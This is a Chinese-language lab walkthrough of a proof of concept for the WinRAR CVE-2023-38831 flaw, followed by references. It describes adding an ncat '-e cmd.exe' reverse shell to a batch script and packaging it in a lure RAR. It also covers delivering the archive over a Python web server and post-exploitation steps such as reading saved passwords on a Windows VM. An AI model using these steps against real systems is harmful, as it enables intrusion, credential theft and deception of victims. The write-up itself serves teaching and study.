CVE-2023-38831 漏洞的概念验证演示
漏洞简要描述
漏洞是如何工作的?

利用的第一部分
第一部分将在攻击者机器上进行,以开始利用过程。

1) 首先,我们需要创建包含恶意附件“pdf”、利用 Python 代码和批处理脚本的利用文件夹,命令如下: “git clone https://github.com/HDCE-inc/CVE-2023-38831”

2) 这是在进行任何利用之前文件夹中包含的内容:

3) 通过 ifconfig 查找 Kali 机器的 IP 地址:

4) 然后我们将修改 script.bat 中的现有脚本,添加以下命令行(上图所示)
“start”用于启动命令行进程,“/min”用于最小化后台的命令提示符窗口,ncat 用于连接到攻击者 IP 地址并通过 4444 端口,最后 -e cmd.exe 用于在命令提示符中执行命令行。

5) 以下是对 exploit.py 代码的解释:
1 表示用户输入的诱饵文件名(document.pdf)、脚本文件名(bat.script)以及受害者看到的 RAR 文件输出名称,本例中我们将其保存为 getrich.rar。
2 表示检查 Kali Linux 机器的 CVE-2023-38831 文件夹中是否存在现有文件,且命名约定是否正确;如果命名错误或文件重复,将打印错误信息并停止退出程序。
3 表示使用 os.mkdir() 创建一个临时文件目录,用于存储新创建的文件,然后再将其压缩成归档文件,并用作工作空间。
4 表示复制行,使用 shutil.copyfile 将诱饵文件和脚本文件复制到“tmp”中各自的目录中,以确保所有必要文件正确就位后再进入下一步。下一步,shutil.make_archive 从“tmp”创建一个名为“tmp.zip”的归档文件,其中包含“tmp”文件夹中的所有内容。
5 表示上述代码运行成功,并根据用户输入的诱饵文件、脚本文件和输出文件名成功创建了一个 RAR 文件作为漏洞利用。

6) 在获取我们的 IP 地址并修改批处理脚本后,我们可以通过运行命令“python exploit.py”来创建恶意“.rar”文件。
exploit.py 将要求用户输入三个字段:已存在的诱饵文件名(document.pdf)、之前修改过的脚本文件名(script.bat)以及用于引诱受害者下载并点击的输出 RAR 文件名,该文件名需要合适,本例中我们使用了“steps-to-generate-income.rar”。 然后,CVE-2023-38831 就可以用来利用受害者机器了。
利用的第二部分
第二部分将在 Kali 机器和受害者机器(一个 Windows 11 虚拟机)上进行。

1) 我们首先要创建一个恶意网站,或者将附件发送给受害者。
左侧,我们将执行“python -m http.server 8080”。此命令用于捕获哪些 IP 地址访问了此恶意 URL,从而我们可以知道受害者的 IP 地址,并监听特定的 HTTP 请求(如“200”)。右侧,受害者被引诱访问该 IP 地址,并下载文件“steps-to-generate-income.rar”。

2) 一旦受害者被成功引诱下载恶意文件“steps-to-generate-income.rar”,将会显示哪个 IP 地址在什么时间下载了该文件。通过这些信息,我们可以获取受害者的 IP 地址。

3) 然后我们在 Kali 机器上设置一个 ncat 监听 4444 端口,因为 4444 端口需要与 script.bat 中写入的在受害者机器上执行的端口同步。
一旦受害者点击 document.pdf,bat.script 将立即运行命令行并最小化到后台,从而为攻击者建立后门连接。

4) 然后我们可以在受害者机器上运行各种命令,例如“C:\Windows”,然后“dir”列出所有存储的不同 exe 文件。
以下是在受害者机器上运行的三个命令:第一个命令(标记为“1”)是“net user”,用于查看有多少个账户,由此我们可以得出结论:只有一个账户 W11。
第二个命令(标记为“2”)是“systeminfo”,用于了解受害者机器的更多信息以及用户的权限,本例中是管理员权限。
第三个命令(标记为“3”)是浏览随机文件夹,本例中我们运行了“C:\Users\W11”然后“dir”查看文件类型和文件夹,再运行“C:\Users\W11\Documents”然后“dir”查看 Documents 目录的内容,幸运的是该用户将密码保存在一个 notepad.txt 文件中。然后我们在命令行中打印该记事本的内容以揭示详细信息,命令为“type secret.txt”。结果显示,通过此命令行我们能够读取、写入和编辑受害者机器上的文件,甚至可以进一步执行诸如植入键盘记录器等操作,使受害者机器更加脆弱并暴露更多敏感信息。

5) 最后,我们可以在用户桌面上创建一个记事本文件,通过运行以下命令:
“echo "You've been hacked, please go to testingwebsite" > C:\Users\W11\D\hacked.txt”,hacked.txt 将创建在用户桌面上,向受害者表明其机器已被利用。
Deland-Han. (2014, February 19). Dynamic link library (DLL) - Windows Client. Microsoft Learn. https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/dynamic-link-library
Gillis, A. S. (2023, September 26). principle of least privilege (POLP). Security. https://www.techtarget.com/searchsecurity/definition/principle-of-least-privilege-POLP
GmbH, W. (n.d.). WinRAR 7.00 Final released. WinRAR Latest News. https://www.win-rar.com/singlenewsview.html?&L=0&cHash=c5bf79590657e32554c6683296a8e8aa&tx_ttnews%5Btt_news%5D=232
Lab, S. (2023, September 26). Analysis of CVE-2023-38831 Zero-Day vulnerability in WinRAR. Penetration Testing and CyberSecurity Solution - SecureLayer7. https://blog.securelayer7.net/analysis-of-cve-2023-38831-zero-day-vulnerability-in-winrar/
Patch management: benefits and best practices | Balbix. (2022, October 22). Balbix. https://www.balbix.com/insights/patch-management-benefits-and-best-practices/
Research, U. T. (2023, November 17). WinRAR CVE-2023-38831 Vulnerability: Malware Exploits & APT Attacks. https://www.uptycs.com/blog/cve-2023-38831-winrar-zero-day
Slavin, B. (2024, March 18). Common DMARC problems faced by users | DMARC Report. DMARC Report. https://dmarcreport.com/blog/common-dmarc-problems-faced-by-users/
ThreatLocker. (2023, September 11). WinRAR Remote Code Execution. ThreatLocker. https://www.threatlocker.com/blog/winrar-remote-code-execution
Traders’ Dollars in Danger: CVE-2023-38831 zero-Day vulnerability in WinRAR exploited by cybercriminals to target traders. (2023, August 23). Group-IB. https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
Vulnera. (2023, November 16). DarkCasino: a new APT threat leveraging WinRAR vulnerability - VULNERA. VULNERA - Vulnerability Management. Simplified. https://vulnera.com/newswire/darkcasino-a-new-apt-threat-leveraging-winrar-vulnerability/